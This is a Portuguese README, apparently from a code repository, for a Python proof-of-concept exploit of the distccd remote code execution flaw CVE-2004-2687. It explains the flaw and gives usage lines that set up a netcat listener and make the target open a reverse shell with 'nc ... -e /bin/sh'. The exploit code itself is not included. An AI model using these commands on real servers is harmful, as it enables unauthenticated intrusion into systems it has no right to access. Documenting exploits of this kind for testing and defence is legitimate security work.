
Exploit de prova de conceito baseado em Python para a vulnerabilidade de execução remota de código distccd CVE-2004-2687, permitindo acesso não autenticado ao shell em servidores vulneráveis.
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2004-2687 #️⃣ Atualize para Python3
Visão Geral
Este repositório contém um exploit de Prova de Conceito (PoC) para a vulnerabilidade do distccd identificada como CVE-2004-2687. A vulnerabilidade existe no daemon distccd, que faz parte do sistema de compilação distribuída distcc para C/C++. Quando configurado de forma inadequada, o distccd permite que atacantes remotos executem comandos arbitrários no servidor sem qualquer autenticação.
Detalhes da Vulnerabilidade
O distcc é projetado para distribuir tarefas de compilação entre várias máquinas, a fim de acelerar o processo de construção. No entanto, se o daemon distccd não estiver devidamente protegido, ele expõe uma vulnerabilidade de execução remota de código (RCE). Isso ocorre porque o daemon escuta em uma porta de rede e aceita comandos de qualquer cliente, permitindo que eles executem comandos shell no servidor como o usuário que executa o daemon.
A vulnerabilidade recebeu o identificador CVE-2004-2687 e afeta as versões do distccd anteriores a 3.1. Quando explorada, um atacante pode obter acesso shell à máquina vulnerável, levando a um potencial comprometimento de todo o sistema.
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"
Vulnerabilidade :

Exploit :
